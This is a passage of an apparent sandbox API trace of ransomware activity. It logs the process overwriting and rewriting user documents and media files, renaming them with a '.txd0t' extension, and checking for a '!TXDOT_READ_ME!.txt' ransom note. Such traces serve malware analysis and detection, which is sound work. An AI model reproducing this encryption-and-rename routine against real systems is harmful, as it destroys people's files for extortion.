StrCpyW (in: psz1=0xecfc0c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.340] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.341] GetProcessHeap () returned 0xe30000 [0074.341] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfbd0 | out: hHeap=0xe30000) returned 1 [0074.341] CloseHandle (hObject=0x468) returned 1 [0074.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx" (normalized: "c:\\users\\fd1hvy\\documents\\qqnuwmakq.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\qqnuwmakq.docx.txd0t")) returned 1 [0074.348] SetEvent (hEvent=0x40c) returned 1 [0074.348] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0074.354] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf" [0074.354] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t" [0074.354] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t") returned 0 [0074.354] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf", dwFileAttributes=0x80) returned 1 [0074.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\sa2u-lpe-ligomos.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0074.354] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=71627) returned 1 [0074.354] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.355] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0074.355] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffee635, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.355] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0x117c0, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x117c0, lpOverlapped=0x0) returned 1 [0074.357] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffee840, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.357] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x117c0, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x117c0, lpOverlapped=0x0) returned 1 [0074.357] FlushFileBuffers (hFile=0x464) returned 1 [0074.368] GetProcessHeap () returned 0xe30000 [0074.368] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed29b8 [0074.368] StrCpyW (in: psz1=0xed29b8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf" [0074.368] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf") returned="sA2u-LPe-LiGoMos.pdf" [0074.368] StrCpyW (in: psz1=0xed29f4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.368] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.368] GetProcessHeap () returned 0xe30000 [0074.368] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed29b8 | out: hHeap=0xe30000) returned 1 [0074.368] CloseHandle (hObject=0x464) returned 1 [0074.370] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\sa2u-lpe-ligomos.pdf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\sa2u-lpe-ligomos.pdf.txd0t")) returned 1 [0074.371] SetEvent (hEvent=0x40c) returned 1 [0074.371] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0074.373] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf" [0074.373] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t" [0074.373] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t") returned 0 [0074.373] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf", dwFileAttributes=0x80) returned 1 [0074.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\u8_nh2y.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0074.374] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=60940) returned 1 [0074.374] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.374] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0074.375] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff0ff4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.375] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0xee00, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0xee00, lpOverlapped=0x0) returned 1 [0074.376] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff1200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.376] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xee00, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0xee00, lpOverlapped=0x0) returned 1 [0074.377] FlushFileBuffers (hFile=0x464) returned 1 [0074.387] GetProcessHeap () returned 0xe30000 [0074.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfa) returned 0xecf5a0 [0074.387] StrCpyW (in: psz1=0xecf5a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf" [0074.387] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf") returned="U8_NH2Y.pdf" [0074.387] StrCpyW (in: psz1=0xecf5dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.387] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.387] GetProcessHeap () returned 0xe30000 [0074.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf5a0 | out: hHeap=0xe30000) returned 1 [0074.387] CloseHandle (hObject=0x464) returned 1 [0074.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\u8_nh2y.pdf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\u8_nh2y.pdf.txd0t")) returned 1 [0074.389] SetEvent (hEvent=0x40c) returned 1 [0074.389] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0074.396] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv" [0074.396] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t" [0074.396] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t") returned 0 [0074.396] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv", dwFileAttributes=0x80) returned 1 [0074.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv" (normalized: "c:\\users\\fd1hvy\\documents\\ut8oama5zk99bj4evrq.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0074.397] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=65181) returned 1 [0074.397] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.397] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0074.398] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeff63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.398] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xfe90, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xfe90, lpOverlapped=0x0) returned 1 [0074.401] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff0170, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.401] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xfe90, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xfe90, lpOverlapped=0x0) returned 1 [0074.401] FlushFileBuffers (hFile=0x46c) returned 1 [0075.064] GetProcessHeap () returned 0xe30000 [0075.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed17d0 [0075.064] StrCpyW (in: psz1=0xed17d0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv" [0075.064] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv") returned="ut8OaMa5zK99bj4EvRQ.csv" [0075.064] StrCpyW (in: psz1=0xed180c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.064] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0075.064] GetProcessHeap () returned 0xe30000 [0075.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed17d0 | out: hHeap=0xe30000) returned 1 [0075.064] CloseHandle (hObject=0x46c) returned 1 [0075.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv" (normalized: "c:\\users\\fd1hvy\\documents\\ut8oama5zk99bj4evrq.csv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\ut8oama5zk99bj4evrq.csv.txd0t")) returned 1 [0075.067] SetEvent (hEvent=0x40c) returned 1 [0075.067] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0075.073] StrCpyW (in: psz1=0x4a9f710, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3" [0075.073] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t" [0075.073] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t") returned 0 [0075.073] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3", dwFileAttributes=0x80) returned 1 [0075.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\o_54edamwws3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.073] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=98883) returned 1 [0075.074] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.074] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0075.074] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe7bbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.074] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x18240, lpNumberOfBytesRead=0x4a9f6d0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6d0*=0x18240, lpOverlapped=0x0) returned 1 [0075.076] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe7dc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.076] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x18240, lpNumberOfBytesWritten=0x4a9f6d4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6d4*=0x18240, lpOverlapped=0x0) returned 1 [0075.077] FlushFileBuffers (hFile=0x460) returned 1 [0075.082] GetProcessHeap () returned 0xe30000 [0075.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x140) returned 0xe9b648 [0075.082] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3" [0075.082] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3") returned="o_54eDamWws3.mp3" [0075.082] StrCpyW (in: psz1=0xe9b6c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.082] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned 1 [0075.082] GetProcessHeap () returned 0xe30000 [0075.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.082] CloseHandle (hObject=0x460) returned 1 [0075.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\o_54edamwws3.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\o_54edamwws3.mp3.txd0t")) returned 1 [0075.085] SetEvent (hEvent=0x40c) returned 1 [0075.085] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0075.090] StrCpyW (in: psz1=0x4a9f710, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav" [0075.090] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t" [0075.090] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t") returned 0 [0075.090] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav", dwFileAttributes=0x80) returned 1 [0075.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\wv1ct5msplb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0075.091] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=52445) returned 1 [0075.091] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.091] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0075.092] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff3123, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.092] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0xccd0, lpNumberOfBytesRead=0x4a9f6d0, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f6d0*=0xccd0, lpOverlapped=0x0) returned 1 [0075.093] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff3330, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.093] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xccd0, lpNumberOfBytesWritten=0x4a9f6d4, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f6d4*=0xccd0, lpOverlapped=0x0) returned 1 [0075.093] FlushFileBuffers (hFile=0x468) returned 1 [0075.098] GetProcessHeap () returned 0xe30000 [0075.098] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x13e) returned 0xe9b648 [0075.098] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav" [0075.098] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav") returned="Wv1ct5mSPlb.wav" [0075.098] StrCpyW (in: psz1=0xe9b6c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.098] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned 1 [0075.098] GetProcessHeap () returned 0xe30000 [0075.098] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.098] CloseHandle (hObject=0x468) returned 1 [0075.100] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\wv1ct5msplb.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\wv1ct5msplb.wav.txd0t")) returned 1 [0075.100] SetEvent (hEvent=0x40c) returned 1 [0075.100] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0075.108] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a" [0075.108] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t" [0075.108] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t") returned 0 [0075.108] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a", dwFileAttributes=0x80) returned 1 [0075.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\wdck.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0075.108] GetFileSizeEx (in: 